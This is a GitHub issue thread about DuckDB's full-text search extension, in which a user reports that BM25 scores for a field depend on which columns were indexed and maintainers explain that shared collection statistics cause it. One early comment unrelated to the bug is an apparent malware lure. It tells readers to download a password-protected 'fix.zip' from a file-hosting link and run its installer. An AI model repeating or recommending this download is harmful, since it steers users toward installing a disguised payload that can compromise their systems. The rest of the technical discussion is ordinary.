### ISSUE TITLE
Invalid BM25 scores when building index with multiple fields

### ISSUE THREAD

**Issue by zeppafi** [duckdb/duckdb#13570]
### What happens?

The BM25 scores vary for the same field when the search index is constructed using different columns.

### To Reproduce

```sql
INSTALL fts;
LOAD fts;

CREATE OR REPLACE TABLE example (
    id VARCHAR,
    field_a VARCHAR,
    field_b VARCHAR,
);

INSERT INTO example VALUES 
    ('doc1', 'hello', 'hello'),
    ('doc2', 'hello', 'world');

-- everything else remains the same, just swap comment between these two lines
  PRAGMA create_fts_index('example', 'id',            'field_b', stopwords='none', overwrite=1);
--PRAGMA create_fts_index('example', 'id', 'field_a', 'field_b', stopwords='none', overwrite=1);

SELECT 
    *,
    fts_main_example.match_bm25(id, 'hello world', fields:='field_b') bm25_score
FROM 
    example;
```
will give following results:
```
┌─────────┬─────────┬─────────┬────────────────────┐
│   id    │ field_a │ field_b │     bm25_score     │
│ varchar │ varchar │ varchar │       double       │
├─────────┼─────────┼─────────┼────────────────────┤
│ doc1    │ hello   │ hello   │ 0.3010299956639812 │
│ doc2    │ hello   │ world   │ 0.3010299956639812 │
└─────────┴─────────┴─────────┴────────────────────┘
```
Let's swap only the create_fts_index calls:
```sql
INSTALL fts;
LOAD fts;

CREATE OR REPLACE TABLE example (
    id VARCHAR,
    field_a VARCHAR,
    field_b VARCHAR,
);

INSERT INTO example VALUES 
    ('doc1', 'hello', 'hello'),
    ('doc2', 'hello', 'world');

-- everything else remains the same, just swap comment between these two lines
--PRAGMA create_fts_index('example', 'id',            'field_b', stopwords='none', overwrite=1);
  PRAGMA create_fts_index('example', 'id', 'field_a', 'field_b', stopwords='none', overwrite=1);

SELECT 
    *,
    fts_main_example.match_bm25(id, 'hello world', fields:='field_b') bm25_score
FROM 
    example;
```
will give following results:
```
┌─────────┬─────────┬─────────┬─────────────────────┐
│   id    │ field_a │ field_b │     bm25_score      │
│ varchar │ varchar │ varchar │       double        │
├─────────┼─────────┼─────────┼─────────────────────┤
│ doc1    │ hello   │ hello   │ 0.07918124604762482 │
│ doc2    │ hello   │ world   │  0.3010299956639812 │
└─────────┴─────────┴─────────┴─────────────────────┘
```
As observed, the bm25_score differs even though the example documents and the match_bm25 call are identical. The only difference is in the indexing: the first create_fts_index includes only field_b, while the second index incorporates both field_a and field_b. This shouldn't affect scoring since scores should be calculated only among words in field_b.

Based on further investigation, it looks like IDF and other stats are calculated only over all FTS-indexed fields, while stats should be available for all possible combinations of different indexed columns.

### OS:

Ubuntu x86_64

### DuckDB Version:

v0.0.1 26471c2

### DuckDB Client:

CLI

### Full Name:

Jaakko Routamaa

### Affiliation:

-

### What is the latest build you tested with? If possible, we recommend testing with the latest nightly build.

I have tested with a nightly build

### Did you include all relevant data sets for reproducing the issue?

Yes

### Did you include all code required to reproduce the issue?

- [X] Yes, I have

### Did you include all relevant configuration (e.g., CPU architecture, Python version, Linux distribution) to reproduce the issue?

- [X] Yes, I have

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lnkuiper** [comment]
The field search capabilities of the FTS extension are currently pretty basic, so this won't be supported unless indexing is overhauled. I'd happily review a PR, as I won't work on this for some time.

**Comment by zeppafi** [comment]
Hi @lnkuiper,

I still believe the current implementation might have some bugs that could confuse users and lead to poor bm25 performance. One potential fast solution could be to remove or deprecate the support for selecting a subset of fields in match_bm25. Or are there any specific cases where the current option for specifying fields parameter in match_bm25 provides significant benefits? There's a possibility that I might be overlooking some details...

Thanks!

**Comment by lnkuiper** [comment]
The `fields` argument allows you to only search for the query terms in those fields, excluding the other fields. So, while it is not a proper BM25-F implementation, it is useful.

**Comment by arjenpdevries** [comment]
In the first case of your create index command, you index only the contents of field B. In the second case, you index the contents of both fields A and B.

When you then rank on the contents of field B, the difference in contents of field A has still influenced the document statistics that are created for your collection. So, I would say it is expected behaviour that the scores are different for the two settings.

**Comment by lnkuiper** [comment]
I guess that settles it! Won't argue with the prof. 😉

**Comment by zeppafi** [comment]
Thank you for your responses! Ok, so is it because built search index is usually good enough, even though it includes some statistics from fields that are not always used in search? 

E.g. if you have fields 'articles' and 'authors' indexed for search, but you want to search only by 'articles', then in doesn't matter so much that also 'authors' were indexed?

**Comment by lnkuiper** [comment]
It will matter when, for example, the term "duck" occurs frequently in "article" but not in "author". Then, the term "duck" is a strong document identifier for "author" but not very strong for "article", so it will affect scores.

When the index is built on both "author" and "article", you lose this information, as there is just one dictionary for both. I don't think this will matter much for most use cases. If you look for author "John Doe", as long as this name does not show up frequently in many articles, it will still be a strong document identifier, and you will still most likely retrieve the relevant documents.

**Comment by zeppafi** [comment]
ok, makes sense now once I know this. Would you consider updating [BM25 documentation](https://duckdb.org/docs/extensions/full_text_search.html) with this example or other additional explanation? Current documentation might be misleading to at least people coming outside IR-community.

p.s.  [create_fts_index](https://duckdb.org/docs/extensions/full_text_search.html#pragma-create_fts_index) ignore argument seems to be outdated. Regex for word ignoring [has changed](https://github.com/duckdb/duckdb/commit/0f6e29f1865e5c851f5f4a85ca3ba4c9996af5c0#diff-5bd647a7a70da89cf2194b0f5dcb9a7db092f795c1742b42d3aecddf17b6c156L269), but [documentation ](https://duckdb.org/docs/extensions/full_text_search.html)gives default ignore regex still as '(\\.|[^a-z])+'
